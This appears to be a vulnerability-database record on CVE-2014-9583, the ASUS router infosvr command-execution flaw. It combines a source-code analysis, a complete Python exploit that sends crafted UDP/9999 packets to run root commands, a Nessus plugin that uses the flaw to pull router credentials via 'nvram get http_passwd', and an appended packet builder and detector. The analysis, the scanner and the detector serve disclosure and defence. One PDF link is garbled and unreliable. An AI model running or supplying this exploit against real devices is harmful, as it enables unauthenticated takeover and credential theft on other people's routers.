Drake published on his GitHub (<a href=\"https://github.com/jduck\">https://github.com/jduck</a>) a PoC for a remote command execution vulnerability in ASUS routers (<a href=\"https://github.com/jduck/asus-cmd\">https://github.com/jduck/asus-cmd</a>). The vulnerability was subsequently assigned CVE-2014-9583.</p><p>The Knownsec security research team studied and analyzed this command execution vulnerability as soon as it was published.</p><h4>a) Vulnerability description</h4><p>ASUS R-series routers use the open-source router firmware <a href=\"https://github.com/RMerl/asuswrt-merlin\" target=\"_blank\">Asuswrt</a>; having the source code made the subsequent vulnerability analysis much easier, since no reverse engineering was needed. Asuswrt contains an <a href=\"https://github.com/RMerl/asuswrt-merlin/tree/master/release/src/router/infosvr\" target=\"_blank\">infosvr</a> process that listens on 0.0.0.0, i.e. on UDP port 9999 of every IP address of the host. infosvr's own authorization mechanism is incomplete, it applies no proper filtering when handling user-submitted data, and it uses the system() function to execute part of the request, which ultimately results in a remote command execution vulnerability.</p><h4>b) Impact</h4><p>According to Joshua J. 
Drake's analysis on GitHub, the affected versions are as follows:</p><p><img src=\"http://blog.knownsec.com/wp-content/uploads/2015/01/1.jpg\" alt=\"1\" width=\"492\" height=\"241\"></p><p>However, the open-source Asuswrt project supports all of the following router hardware models, so users of these models are advised to check whether their device is vulnerable:</p><ul><li>RT-N16</li><li>RT-AC56U</li><li>RT-N66U</li><li>RT-AC66U</li><li>RT-AC68U</li><li>RT-AC68P</li><li>RT-AC87U</li></ul><h4>c) Vulnerability analysis</h4><p>Source file:</p><p><a href=\"https://github.com/RMerl/asuswrt-merlin/blob/34b5933112d7164b68add63fee63f007a0569309/release/src/router/infosvr/infosvr.c\">https://github.com/RMerl/asuswrt-merlin/blob/34b5933112d7164b68add63fee63f007a0569309/release/src/router/infosvr/infosvr.c</a><br></p><p>At line 162, infosvr binds to UDP port 9999 on 0.0.0.0, as shown:</p><p><img src=\"http://blog.knownsec.com/wp-content/uploads/2015/01/image003.png\" alt=\"image003\" width=\"638\" height=\"179\"></p><p> </p><p>At line 186, infosvr hands the incoming request to the processReq() function, as shown:</p><p><img src=\"http://blog.knownsec.com/wp-content/uploads/2015/01/image005.png\" alt=\"image005\" width=\"642\" height=\"243\"></p><p>processReq() receives 512 bytes of request data and, at line 227, passes it to processPacket() for handling, as shown:</p><p><img src=\"http://blog.knownsec.com/wp-content/uploads/2015/01/image007.png\" alt=\"image007\" width=\"643\" height=\"454\"></p><p> 
</p><p>The processPacket() function is located in the file:</p><p><a href=\"https://github.com/RMerl/asuswrt-merlin/blob/34b5933112d7164b68add63fee63f007a0569309/release/src/router/infosvr/common.c\">https://github.com/RMerl/asuswrt-merlin/blob/34b5933112d7164b68add63fee63f007a0569309/release/src/router/infosvr/common.c</a><br></p><p>At line 202, processPacket() casts the 512-byte request data (the pdubuf char pointer) to an IBOX_COMM_PKT_HDR structure (phdr); an attacker who wants to trigger the vulnerability must send packets that follow this structure, as shown:</p><p><img src=\"http://blog.knownsec.com/wp-content/uploads/2015/01/image009.png\" alt=\"image009\" width=\"647\" height=\"343\"></p><p>The IBOX_COMM_PKT_HDR structure is in the file:</p><p><a href=\"https://github.com/RMerl/asuswrt-merlin/blob/34b5933112d7164b68add63fee63f007a0569309/release/src/router/infosvr/iboxcom.h.wirelesshd\">https://github.com/RMerl/asuswrt-merlin/blob/34b5933112d7164b68add63fee63f007a0569309/release/src/router/infosvr/iboxcom.h.wirelesshd</a><br></p><p>IBOX_COMM_PKT_HDR is defined at line 81, as shown:</p><p><img src=\"http://blog.knownsec.com/wp-content/uploads/2015/01/image011.png\" alt=\"image011\" width=\"641\" height=\"110\"></p><p>To reach the key code region where the vulnerability is triggered, the if check at line 207 of common.c must be passed, as shown:</p><p><img src=\"http://blog.knownsec.com/wp-content/uploads/2015/01/image013.png\" alt=\"image013\" width=\"645\" 
height=\"104\"></p><p>So the first two bytes of the attack payload must be set to the values of the constants NET_SERVICE_ID_IBOX_INFO and NET_PACKET_TYPE_CMD, i.e. \\x0C\\x15 (12 and 21 in decimal), as shown:</p><p><img src=\"http://blog.knownsec.com/wp-content/uploads/2015/01/image015.png\" alt=\"image015\" width=\"645\" height=\"140\"></p><p>At line 222 of common.c, the infosvr author apparently intended to authorize, or validate, the data that can subsequently reach the system() call. Here a MAC check (line 227) and a password check are used, but for some reason the password check is commented out (line 240), and the MAC check code is also merely decorative, as shown:</p><p><img src=\"http://blog.knownsec.com/wp-content/uploads/2015/01/image017.png\" alt=\"image017\" width=\"644\" height=\"355\"></p><p>Before the check, the 512-byte pdubuf is cast to the IBOX_COMM_PKT_HDR_EX structure, which contains the MAC field and the password field, as shown:</p><p><img src=\"http://blog.knownsec.com/wp-content/uploads/2015/01/image019.png\" alt=\"image019\" width=\"644\" 
height=\"117\"></p><p>Why is the MAC check decorative? Because at line 227 of common.c the code merely copies the first 6 bytes of MacAddress into the char array mac; the return value is a pointer to mac, which is never 0, so the check is useless, as shown:</p><p><img src=\"http://blog.knownsec.com/wp-content/uploads/2015/01/image021.png\" alt=\"image021\" width=\"642\" height=\"155\"></p><p>One might guess that the author meant to use memcmp() and used the wrong function, but there is no way to know.</p><p>Moving on, line 251 of common.c enters the switch() stage, which runs a different branch for each OpCode; only when the OpCode equals the NET_CMD_ID_MANU_CMD constant (51 decimal, 0x33 hex) is the system() code reached, so the first four bytes of the attack payload must be \\x0C\\x15\\x33\\x00, as shown:</p><p><img src=\"http://blog.knownsec.com/wp-content/uploads/2015/01/image023.png\" alt=\"image023\" width=\"643\" height=\"93\"></p><p><img src=\"http://blog.knownsec.com/wp-content/uploads/2015/01/image025.png\" alt=\"image025\" width=\"643\" 
height=\"243\"></p><p>In the NET_CMD_ID_MANU_CMD branch of common.c, line 440 skips the IBOX_COMM_PKT_HDR_EX portion of pdubuf and casts the remainder to a PKT_SYSCMD structure, which serves as the command execution data; the PKT_SYSCMD structure is shown below:</p><p><img src=\"http://blog.knownsec.com/wp-content/uploads/2015/01/image027.png\" alt=\"image027\" width=\"644\" height=\"64\"></p><p>Finally, at line 514 of common.c the cmd field of the syscmd structure is assigned to cmdstr, and at line 515 cmdstr is executed as a command by system(), as shown:</p><p><img src=\"http://blog.knownsec.com/wp-content/uploads/2015/01/image029.png\" alt=\"image029\" width=\"643\" height=\"93\"></p><h4>d) Reproduction</h4><p>Test script:</p><p><a href=\"http://www.exploit-db.com/exploits/35688/\">http://www.exploit-db.com/exploits/35688/</a><br></p><p>Download the vulnerable ASUS router firmware:</p><p><a href=\"http://dlsvr04.asus.com/pub/ASUS/wireless/RT-AC66U/FW_RT_AC66U_30043763626.zip\">http://dlsvr04.asus.com/pub/ASUS/wireless/RT-AC66U/FW_RT_AC66U_30043763626.zip</a><br></p><p>Extract the file with binwalk:</p><p><img src=\"http://blog.knownsec.com/wp-content/uploads/2015/01/31.png\" alt=\"31\" width=\"659\" height=\"258\"></p><p><img src=\"http://blog.knownsec.com/wp-content/uploads/2015/01/image033.png\" alt=\"image033\" width=\"652\" height=\"106\"></p><p> </p><p>Run it under emulation, as shown:</p><p><img src=\"http://blog.knownsec.com/wp-content/uploads/2015/01/image035.png\" alt=\"image035\" width=\"610\" height=\"395\"></p><p>Attack the infosvr program, as shown:</p><p><img 
src=\"http://blog.knownsec.com/wp-content/uploads/2015/01/image037.png\" alt=\"image037\" width=\"608\" height=\"393\"></p><p>The command executes successfully, as shown:</p><p><img src=\"http://blog.knownsec.com/wp-content/uploads/2015/01/image039.png\" alt=\"image039\" width=\"626\" height=\"465\"></p><h4>e) Fix</h4><p>The open-source Asuswrt project fixed the vulnerability on the afternoon of January 10, 2015; the fix simply comments out the key section that triggers the command execution, as shown:</p><p><img src=\"http://blog.knownsec.com/wp-content/uploads/2015/01/image041.png\" alt=\"image041\" width=\"644\" height=\"269\"></p><p>ASUS has also released corresponding firmware updates; users who want to fix the vulnerability can download the updated firmware for their router model:</p><p><a href=\"http://www.asus.com.cn/Networking/Wireless_Routers_Products/\">http://www.asus.com.cn/Networking/Wireless_Routers_Products/</a><br></p><p>For example, the update for the RT-AC66U released on January 12, 2015, as shown:</p><p><img src=\"http://blog.knownsec.com/wp-content/uploads/2015/01/image043.png\" alt=\"image043\" width=\"611\" height=\"266\"></p><p> </p><p>ZoomEye detection report</p><p>Because this ASUS router command execution vulnerability is difficult to probe non-destructively, we estimated its scope from model numbers alone. Searching ZoomEye (<a href=\"http://www.zoomeye.org\" 
rel=\"nofollow\">http://www.zoomeye.org</a>) for the affected ASUS router models, we obtained the following data:</p><p><img src=\"http://blog.knownsec.com/wp-content/uploads/2015/01/10.jpg\" alt=\"10\" width=\"488\" height=\"186\"></p><p>RT-AC66U: 21776 devices, as shown:</p><p><img src=\"http://blog.knownsec.com/wp-content/uploads/2015/01/image045.png\" alt=\"image045\" width=\"554\" height=\"286\"></p><p>RT-N66U: 37156 devices, as shown:</p><p><img src=\"http://blog.knownsec.com/wp-content/uploads/2015/01/222222.jpg\" alt=\"222222\" width=\"555\" height=\"290\"></p><p>RT-AC87U: 1314 devices, as shown:</p><p><img src=\"http://blog.knownsec.com/wp-content/uploads/2015/01/image049.png\" alt=\"image049\" width=\"539\" height=\"283\"></p><p>RT-N56U: 23974 devices, as shown:</p><p><img src=\"http://blog.knownsec.com/wp-content/uploads/2015/01/image051.png\" alt=\"image051\" width=\"518\" height=\"322\"></p><p>A router's management port is normally not exposed on the public Internet; what we found are only the router devices whose management port is open on the public Internet, and we believe many more devices are hidden behind them. Users are therefore advised to upgrade their ASUS router firmware as soon as possible.</p><p><strong>Related links</strong></p><ol><li><a href=\"http://www.freebuf.com/news/56074.html\">http://www.freebuf.com/news/56074.html</a></li><li><a href=\"https://github.com/jduck/asus-cmd\">https://github.com/jduck/asus-cmd</a></li><li><a href=\"https://github.com/RMerl/asuswrt-merlin\">https://github.com/RMerl/asuswrt-merlin</a></li><li><a 
href=\"http://www.asus.com.cn/Networking/RTAC68U/HelpDesk_Download/\">http://www.asus.com.cn/Networking/RTAC68U/HelpDesk_Download/</a></li></ol><p><br></p><p>PDF download: <a href=\"http://whttp://blog.knownsec.com/wp-content/uploads/2015/01/%E5%8D%8E%E7%A1%95%E8%B7%AF%E7%94%B1%E5%99%A89999%E7%AB%AF%E5%8F%A3%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E7%A0%94%E7%A9%B6%E6%8A%A5%E5%91%8A-V1.pdfww.example.com\" target=\"_blank\">ASUS Router Port 9999 Remote Command Execution Research Report V1</a><br></p>", "cvss3": {}, "published": "2015-07-02T00:00:00", "type": "seebug", "title": "ASUSWRT 3.0.0.4.376_1071 - LAN Backdoor Command Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-9583"], "modified": "2015-07-02T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-89236", "id": "SSV:89236", "sourceData": "\n #!/usr/bin/env python3\n\n# Exploit Title: ASUSWRT 3.0.0.4.376_1071 LAN Backdoor Command Execution\n# Date: 2014-10-11\n# Vendor Homepage: http://www.asus.com/\n# Software Link: http://dlcdnet.asus.com/pub/ASUS/wireless/RT-N66U_B1/FW_RT_N66U_30043762524.zip\n# Source code: http://dlcdnet.asus.com/pub/ASUS/wireless/RT-N66U_B1/GPL_RT_N66U_30043762524.zip\n# Tested Version: 3.0.0.4.376_1071-g8696125\n# Tested Device: RT-N66U\n\n# Description:\n# A service called \"infosvr\" listens on port 9999 on the LAN bridge.\n# Normally this service is used for device discovery using the\n# \"ASUS Wireless Router Device Discovery Utility\", but this service contains a\n# feature that allows an unauthenticated user on the LAN to execute commands\n# <= 237 bytes as root. 
Source code is in asuswrt/release/src/router/infosvr.\n# \"iboxcom.h\" is in asuswrt/release/src/router/shared.\n#\n# Affected devices may also include wireless repeaters and other networking\n# products, especially the ones which have \"Device Discovery\" in their features\n# list.\n#\n# Using broadcast address as the IP address should work and execute the command\n# on all devices in the network segment, but only receiving one response is\n# supported by this script.\n\nimport sys, os, socket, struct\n\n\nPORT = 9999\n\nif len(sys.argv) < 3:\n print('Usage: ' + sys.argv[0] + ' <ip> <command>', file=sys.stderr)\n sys.exit(1)\n\n\nip = sys.argv[1]\ncmd = sys.argv[2]\n\nenccmd = cmd.encode()\n\nif len(enccmd) > 237:\n # Strings longer than 237 bytes cause the buffer to overflow and possibly crash the server. \n print('Values over 237 will give rise to undefined behaviour.', file=sys.stderr)\n sys.exit(1)\n\nsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\nsock.bind(('0.0.0.0', PORT))\nsock.settimeout(2)\n\n# Request consists of following things\n# ServiceID [byte] ; NET_SERVICE_ID_IBOX_INFO\n# PacketType [byte] ; NET_PACKET_TYPE_CMD\n# OpCode [word] ; NET_CMD_ID_MANU_CMD\n# Info [dword] ; Comment: \"Or Transaction ID\"\n# MacAddress [byte[6]] ; Double-wrongly \"checked\" with memcpy instead of memcmp\n# Password [byte[32]] ; Not checked at all\n# Length [word]\n# Command [byte[420]] ; 420 bytes in struct, 256 - 19 unusable in code = 237 usable\n\npacket = (b'\\x0C\\x15\\x33\\x00' + os.urandom(4) + (b'\\x00' * 38) + struct.pack('<H', len(enccmd)) + enccmd).ljust(512, b'\\x00')\n\nsock.sendto(packet, (ip, PORT))\n\n\n# Response consists of following things\n# ServiceID [byte] ; NET_SERVICE_ID_IBOX_INFO\n# PacketType [byte] ; NET_PACKET_TYPE_RES\n# OpCode [word] ; NET_CMD_ID_MANU_CMD\n# Info [dword] ; Equal to Info of request\n# MacAddress [byte[6]] ; Filled in for us\n# Length [word]\n# Result [byte[420]] ; Actually returns that amount\n\nwhile True:\n data, 
addr = sock.recvfrom(512)\n\n if len(data) == 512 and data[1] == 22:\n  break\n\nlength = struct.unpack('<H', data[14:16])[0]\ns = slice(16, 16+length)\nsys.stdout.buffer.write(data[s])\n\nsock.close()\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-89236", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2023-05-18T14:09:32", "description": "The remote device is an ASUS router that contains firmware which is affected by a flaw in its 'infosvr' service due to not properly checking the MAC address of a request. An unauthenticated, remote attacker, using a crafted request to UDP port 9999, can exploit this to run arbitrary commands or access configuration details (including passwords) on the device.", "cvss3": {}, "published": "2015-01-14T00:00:00", "type": "nessus", "title": "ASUS Router 'infosvr' Remote Command Execution", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-9583"], "modified": "2019-11-25T00:00:00", "cpe": ["cpe:/o:asus:rt-ac66u_firmware", "cpe:/o:asus:rt-n66u_firmware"], "id": "ASUSWRT_INFOSVR_COMMAND_EXEC.NASL", "href": "https://www.tenable.com/plugins/nessus/80518", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(80518);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/11/25\");\n\n script_cve_id(\"CVE-2014-9583\");\n script_bugtraq_id(71889);\n script_xref(name:\"EDB-ID\", value:\"35688\");\n\n script_name(english:\"ASUS Router 'infosvr' Remote Command Execution\");\n script_summary(english:\"Attempts to exploit the ASUS Router 'infosvr' service backdoor.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device contains a backdoor.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote device is an ASUS router that contains firmware which is\naffected by a flaw in its 'infosvr' service due to not properly\nchecking the MAC 
address of a request. An unauthenticated, remote\nattacker, using a crafted request to UDP port 9999, can exploit this\nto run arbitrary commands or access configuration details (including\npasswords) on the device.\");\n # https://packetstormsecurity.com/files/129815/ASUSWRT-3.0.0.4.376_1071-LAN-Backdoor-Command-Execution.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ba42dc23\");\n script_set_attribute(attribute:\"see_also\", value:\"https://event.asus.com/2013/nw/ASUSWRT/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/jduck/asus-cmd\");\n script_set_attribute(attribute:\"solution\", value:\n\"Contact the device vendor regarding the availability of an update.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:U/RC:ND\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'ASUS infosvr Auth Bypass Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:asus:rt-ac66u_firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:asus:rt-n66u_firmware\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"Backdoors\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_require_udp_ports(9999);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"raw.inc\");\ninclude(\"data_protection.inc\");\n\nport = 9999;\n\nif (islocalhost()) exit(0, \"This plugin can not be run against the localhost.\");\nif (!islocalnet()) exit(0, \"The remote host is more than one hop away.\");\n\nif (known_service(port:port, ipproto:\"udp\")) audit(AUDIT_SVC_ALREADY_KNOWN, port);\nif (!get_udp_port_state(port)) audit(AUDIT_PORT_CLOSED, port, \"udp\");\n\nset_byte_order(BYTE_ORDER_LITTLE_ENDIAN);\n\nfunction run_command(udp_socket, command, timeout)\n{\n local_var packet, ll, bpf, output, res, pkt, data, out_len;\n\n output = NULL;\n\n packet =\n mkbyte(0x0C) +\n mkbyte(0x15) +\n mkword(0x0033) +\n mkdword(rand()) +\n mkpad(38) +\n mkword(strlen(command)) +\n command;\n\n packet = packet + mkpad(512 - strlen(packet));\n\n ll = link_layer();\n if (isnull(ll)) exit(1, \"Could not find the link layer we are operating on.\");\n\n bpf = bpf_open(\"udp and src port 9999 and dst port 9999 and dst host 255.255.255.255\");\n if (isnull(bpf)) exit(1, \"Could not obtain a bpf.\");\n\n send(socket:udp_socket, data:packet);\n\n res = bpf_next(bpf:bpf, timeout:timeout);\n if (!isnull(res))\n {\n res = substr(res, strlen(ll), strlen(res) - 1);\n if (!isnull(res))\n {\n pkt = packet_split(res);\n if (!isnull(pkt) && !isnull(pkt[2]) &&!isnull(pkt[2]['data']))\n {\n data = pkt[2]['data'];\n if (strlen(data) >= 16)\n {\n out_len = getword(blob:data, pos:14);\n if (out_len > 0)\n {\n output = chomp(substr(data, 16, 15 + out_len));\n }\n }\n }\n }\n }\n\n bpf_close(bpf);\n\n return output;\n}\n\ns = open_sock_udp(port);\nif (!s) audit(AUDIT_SOCK_FAIL, port, \"udp\");\n\ntimeout = get_read_timeout() * 1000;\n\nwps_mfstring = run_command(udp_socket:s, command:\"nvram get wps_mfstring\", timeout:timeout);\n\nif (\"ASUS\" >!< wps_mfstring) audit(AUDIT_NOT_LISTEN, \"The ASUSWRT 
'infosvr' service\", port, \"udp\");\n\nuser = run_command(udp_socket:s, command:\"nvram get http_username\", timeout:timeout);\npass = run_command(udp_socket:s, command:\"nvram get http_passwd\", timeout:timeout);\n\n# mask the actual password except the first and last character\nif (!isnull(pass) && strlen(pass) >= 2)\n pass = pass[0] + crap(data:'*', length:6) + pass[strlen(pass)-1];\n\nregister_service(port:port, ipproto:\"udp\", proto:\"asuswrt_infosvr\");\n\nif (report_verbosity > 0 && !isnull(user) && !isnull(pass))\n{\n report =\n '\\nNessus was able to exploit the vulnerability to gather the HTTP' +\n '\\ncredentials of the ASUS router:' +\n '\\n' +\n '\\n Username : ' + data_protection::sanitize_user_enum(users:user) +\n '\\n Password : ' + pass +\n '\\n' +\n '\\nNote that the password displayed here has been partially obfuscated.' +\n '\\n';\n\n security_hole(port:port, proto:\"udp\", extra:report);\n}\nelse security_hole(port:port, proto:\"udp\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}]}
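The seebug exploit and the Nessus plugin above both speak the same infosvr wire format: a 512-byte UDP datagram to port 9999 whose MAC and password fields are never really checked, so a NET_CMD_ID_MANU_CMD request from any LAN host runs as root. The following is an added example, written for this page and not taken from the seebug script, Tenable's plugin or ASUS's code: an offline codec for that format plus a classifier that a detection engineer can run over captured UDP/9999 payloads. The field layout, the 0x0C/0x15/0x0033 header bytes, the response type 22 (0x16) and the 237-byte limit come from the exploit's comments; the function names, the constructed router reply and the sample MAC address are this example's own assumptions.

```python
# Added example (not the seebug exploit or the Nessus plugin): offline codec and
# detector for the ASUS infosvr UDP/9999 MANU_CMD packets. Header values come
# from the exploit's packet b'\x0C\x15\x33\x00' and its data[1] == 22 check;
# function names, the constructed reply and the MAC are assumptions.
import os
import struct

INFOSVR_PORT = 9999
PACKET_LEN = 512                 # request and response are both 512-byte datagrams
MAX_CMD_LEN = 237                # exploit: "256 - 19 unusable in code = 237 usable"

SERVICE_ID_IBOX_INFO = 0x0C
PACKET_TYPE_CMD = 0x15
PACKET_TYPE_RES = 0x16           # 22 decimal, what the exploit tests data[1] against
CMD_ID_MANU_CMD = 0x0033         # little-endian on the wire: 33 00

# Offsets: ServiceID(1) PacketType(1) OpCode(2) Info(4) MacAddress(6) = 14
REQ_LEN_OFF = 14 + 32            # request carries a 32-byte Password before Length
REQ_CMD_OFF = REQ_LEN_OFF + 2    # 48
RES_LEN_OFF = 14                 # response has no Password field
RES_OUT_OFF = RES_LEN_OFF + 2    # 16


def build_manu_cmd(command, info=None):
    """Build a NET_CMD_ID_MANU_CMD request the way the exploit does.

    MacAddress and Password stay zeroed: per the exploit's comments the server
    memcpy()s the MAC instead of comparing it and never checks the password.
    """
    if len(command) > MAX_CMD_LEN:
        raise ValueError("commands over %d bytes overflow the server buffer" % MAX_CMD_LEN)
    info = os.urandom(4) if info is None else info
    if len(info) != 4:
        raise ValueError("Info (transaction id) must be 4 bytes")
    pkt = (bytes([SERVICE_ID_IBOX_INFO, PACKET_TYPE_CMD])
           + struct.pack("<H", CMD_ID_MANU_CMD)
           + info
           + b"\x00" * 6                      # MacAddress: copied, never compared
           + b"\x00" * 32                     # Password: not checked at all
           + struct.pack("<H", len(command))
           + command)
    return pkt.ljust(PACKET_LEN, b"\x00")


def parse_response(data, expected_info=None):
    """Return the command output from a MANU_CMD response, or None.

    Mirrors the exploit's 'len == 512 and data[1] == 22' test and adds the
    opcode, transaction-id and length-bounds checks a client should make
    before trusting bytes from a broadcast-reachable UDP service.
    """
    if len(data) != PACKET_LEN:
        return None
    if data[0] != SERVICE_ID_IBOX_INFO or data[1] != PACKET_TYPE_RES:
        return None
    if struct.unpack_from("<H", data, 2)[0] != CMD_ID_MANU_CMD:
        return None
    if expected_info is not None and data[4:8] != expected_info:
        return None
    length = struct.unpack_from("<H", data, RES_LEN_OFF)[0]
    if length > PACKET_LEN - RES_OUT_OFF:
        return None                           # claims more output than the datagram holds
    return data[RES_OUT_OFF:RES_OUT_OFF + length]


def classify_datagram(payload):
    """Label a UDP/9999 payload: MANU_CMD requests (what an attacker, the seebug
    script or the Nessus plugin sends), the router's replies, or 'other'."""
    if len(payload) < 4 or payload[0] != SERVICE_ID_IBOX_INFO:
        return "other"
    if struct.unpack_from("<H", payload, 2)[0] != CMD_ID_MANU_CMD:
        return "other"
    if payload[1] == PACKET_TYPE_CMD:
        return "manu_cmd_request"
    if payload[1] == PACKET_TYPE_RES:
        return "manu_cmd_response"
    return "other"


def extract_command(payload):
    """Pull the shell command out of a MANU_CMD request, for alert context."""
    if classify_datagram(payload) != "manu_cmd_request" or len(payload) < REQ_CMD_OFF:
        return None
    length = struct.unpack_from("<H", payload, REQ_LEN_OFF)[0]
    return payload[REQ_CMD_OFF:REQ_CMD_OFF + length]


def make_response(info, output, mac=b"\x00\x11\x22\x33\x44\x55"):
    """Constructed router reply (this example's own, for offline testing)."""
    pkt = (bytes([SERVICE_ID_IBOX_INFO, PACKET_TYPE_RES])
           + struct.pack("<H", CMD_ID_MANU_CMD)
           + info + mac
           + struct.pack("<H", len(output))
           + output)
    return pkt.ljust(PACKET_LEN, b"\x00")


if __name__ == "__main__":
    txn = os.urandom(4)
    req = build_manu_cmd(b"nvram get wps_mfstring", txn)    # same probe Nessus sends
    print(classify_datagram(req), extract_command(req))
    resp = make_response(txn, b"ASUSTeK Computer Inc.\n")  # constructed reply
    print(classify_datagram(resp), parse_response(resp, txn))
```

For monitoring, any datagram that `classify_datagram` labels `manu_cmd_request` on the LAN is worth an alert with the output of `extract_command` attached, since legitimate discovery traffic uses other opcodes; note that the Nessus plugin itself will trip such a rule because it runs `nvram get http_passwd` over the same channel, and that both the exploit and the plugin listen for the reply on the broadcast address, so the response may be visible to every host on the segment.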